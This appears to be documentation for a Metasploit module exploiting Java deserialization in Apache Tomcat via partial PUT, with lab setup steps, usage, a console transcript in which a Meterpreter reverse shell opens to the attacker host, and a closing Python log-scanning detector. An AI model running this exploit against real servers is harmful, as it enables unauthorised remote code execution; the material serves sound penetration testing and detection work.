## Vulnerable Application

This module exploits a Java deserialization vulnerability in Apache Tomcat's session restoration functionality. A partial HTTP PUT request is used to place an attacker-controlled deserialization payload in the `/webapps/ROOT/` directory, where Tomcat later deserializes it as a persisted session. For the exploit to succeed, writes must be enabled for the default servlet (`readonly` set to `false`), and `org.apache.catalina.session.PersistentManager` must be configured to use `org.apache.catalina.session.FileStore`.

## Setup

Download Ubuntu Server 24:

```
wget https://mirror.0xem.ma/ubuntu-releases/24.04.2/ubuntu-24.04.2-live-server-amd64.iso
```

Install Ubuntu on your preferred hypervisor and enable SSH during installation. Reboot once the installation is complete and SSH into the target.

Download Tomcat and Java:

```
wget https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.90/bin/apache-tomcat-9.0.90.zip
wget https://cdn.azul.com/zulu/bin/zulu8.80.0.17-ca-jdk8.0.422-linux_x64.tar.gz
```

Extract the JDK archive to the appropriate directory:

```
tar -xvzf zulu8.80.0.17-ca-jdk8.0.422-linux_x64.tar.gz
sudo mkdir -p /opt/java
sudo mv zulu8.80.0.17-ca-jdk8.0.422-linux_x64 /opt/java/zulu8
```

Install `unzip` and extract Tomcat:

```
sudo apt install unzip -y
sudo unzip apache-tomcat-9.0.90.zip -d /opt/
```

Set `CATALINA_HOME` and `JAVA_HOME`, and update `PATH`, by adding the following to `~/.bashrc`:

```
export CATALINA_HOME=/opt/apache-tomcat-9.0.90
export JAVA_HOME=/opt/java/zulu8
export PATH=$JAVA_HOME/bin:$PATH
```

Apply the changes:

```
source ~/.bashrc
```

Change the Tomcat permissions so the unprivileged account that will run Tomcat (`msfuser` in the scenario below) owns the installation:

```
sudo chown -R msfuser:msfuser /opt/apache-tomcat-9.0.90
sudo chmod -R +x /opt/apache-tomcat-9.0.90/bin
```

Edit `conf/web.xml` and update the default servlet definition with the following (the `readonly` parameter set to `false` is what enables PUT writes; Tomcat ships with it unset, which means `true`):

```
<servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
        <param-name>debug</param-name>
        <param-value>0</param-value>
    </init-param>
    <init-param>
        <param-name>listings</param-name>
        <param-value>false</param-value>
    </init-param>
    <init-param>
        <param-name>readonly</param-name>
        <param-value>false</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
</servlet>
```

Edit `conf/context.xml` and add a `Manager` element inside the pre-existing `<Context>` tags so that `PersistentManager` uses `FileStore` (minimal form):

```
<Manager className="org.apache.catalina.session.PersistentManager">
    <Store className="org.apache.catalina.session.FileStore"/>
</Manager>
```

Create the following directory inside the Tomcat root directory:

```
mkdir -p webapps/ROOT/WEB-INF/lib
cd ./webapps/ROOT/WEB-INF/lib
```

Download the following dependencies (they supply the classes the ysoserial gadget chain relies on):

```
wget https://repo1.maven.org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.jar
wget https://repo1.maven.org/maven2/commons-beanutils/commons-beanutils/1.9.4/commons-beanutils-1.9.4.jar
wget https://repo1.maven.org/maven2/commons-collections/commons-collections/3.1/commons-collections-3.1.jar
```

Start the vulnerable Tomcat instance:

```
cd /opt/apache-tomcat-9.0.90/bin
./startup.sh
```

## Options

### GADGET

The ysoserial gadget chain to use to obtain RCE (`CommonsCollections6` in the scenario below).

## Verification Steps

1. Start msfconsole
2. `use multi/http/tomcat_partial_put_deserialization`
3. `set RHOST [IP]`
4. `set RPORT [PORT]`
5. `set GADGET [GADGET]`
6. `set LHOST eth0`
7. `check`
8. `exploit`

## Scenarios

### Apache Tomcat 9.0.90, JDK 8.0.422 running on Ubuntu Server 24

Target: Linux Command

```
msf > use multi/http/tomcat_partial_put_deserialization
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
msf exploit(multi/http/tomcat_partial_put_deserialization) > set rport 8080
rport => 8080
msf exploit(multi/http/tomcat_partial_put_deserialization) > set rhost 172.16.199.130
rhost => 172.16.199.130
msf exploit(multi/http/tomcat_partial_put_deserialization) > set gadget CommonsCollections6
gadget => CommonsCollections6
msf exploit(multi/http/tomcat_partial_put_deserialization) > check
[!] This exploit may require manual cleanup of '../webapps/ROOT/YLNKdGSIcB.session' on the target
[+] 172.16.199.130:8080 - The target is vulnerable.
msf exploit(multi/http/tomcat_partial_put_deserialization) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] Utilizing CommonsCollections6 deserialization chain
[+] Uploaded ysoserial payload (imNsIsZCCC.session) via partial PUT
[*] Attempting to deserialize session file..
[+] 500 error response usually indicates success :)
[*] Sending stage (24772 bytes) to 172.16.199.130
[+] Deleted ../webapps/ROOT/pAdshcNMRO.session
[+] Deleted ../webapps/ROOT/imNsIsZCCC.session
[*] Meterpreter session 6 opened (172.16.199.1:4444 -> 172.16.199.130:44562) at 2025-04-02 13:34:50 -0700

meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer        : msfserver
OS              : Linux 6.8.0-57-generic #59-Ubuntu SMP PREEMPT_DYNAMIC Sat Mar 15 17:40:59 UTC 2025
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter >
```
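The module output above gives a defender the traffic shape to hunt for: a PUT that stores a `.session` file through the default servlet, followed a moment later by a request from the same client that ends in a 500 when the session file is deserialized. The script below is an added example, not from the module or its documentation: it scans Tomcat access log lines in the `AccessLogValve` `common` pattern (`%h %l %u %t "%r" %s %b`) and flags that sequence. The log lines are constructed; the client IP, file name and timestamps mirror the scenario, while the request paths and status codes are assumptions, as are the function names and the `window_seconds` parameter.

```python
"""Flag the upload-then-deserialize sequence in Tomcat access logs.
Added example with constructed log lines; any PUT through the default servlet
is reported, and a PUT of a .session file followed by a 500 from the same
client within a short window is reported as high severity."""
import re
from datetime import datetime, timedelta

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Constructed sample log. Paths and status codes are assumptions made for the example.
SAMPLE_LOG = """\
172.16.199.1 - - [02/Apr/2025:13:34:40 -0700] "GET /index.jsp HTTP/1.1" 200 11156
10.0.0.7 - - [02/Apr/2025:13:34:42 -0700] "GET /docs/ HTTP/1.1" 200 7490
172.16.199.1 - - [02/Apr/2025:13:34:47 -0700] "PUT /imNsIsZCCC.session HTTP/1.1" 201 -
172.16.199.1 - - [02/Apr/2025:13:34:49 -0700] "GET / HTTP/1.1" 500 1205
10.0.0.7 - - [02/Apr/2025:13:35:10 -0700] "GET /manager/html HTTP/1.1" 401 2473
"""


def parse_line(line):
    """Parse one common-pattern line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_suspicious(log_text, window_seconds=60):
    """Return findings as (severity, client_ip, message) tuples in log order."""
    records = [r for r in (parse_line(l) for l in log_text.splitlines()) if r]
    findings = []
    for i, rec in enumerate(records):
        if rec["method"] != "PUT":
            continue
        # A PUT that the default servlet accepted means writes are enabled; always worth a look.
        findings.append(("medium", rec["ip"], f"PUT to {rec['path']} (default servlet writable?)"))
        if not rec["path"].lower().endswith(".session"):
            continue
        # A stored .session file plus a 500 from the same client shortly afterwards
        # matches the "upload via partial PUT, then deserialize" steps in the module output.
        deadline = rec["ts"] + timedelta(seconds=window_seconds)
        for later in records[i + 1:]:
            if later["ts"] > deadline:
                break
            if later["ip"] == rec["ip"] and later["status"] == 500:
                findings.append(("high", rec["ip"],
                                 f"PUT of {rec['path']} followed by HTTP 500 on {later['path']}"))
                break
    return findings


if __name__ == "__main__":
    for severity, ip, message in find_suspicious(SAMPLE_LOG):
        print(f"[{severity}] {ip}: {message}")
```

On a hardened server (default servlet read-only) the medium finding alone is already a policy violation, because no PUT should ever succeed; the high finding is the one to treat as a probable compromise and to pair with a check for stray `.session` files under `webapps/ROOT/`, which the module deletes on success but leaves behind if it fails.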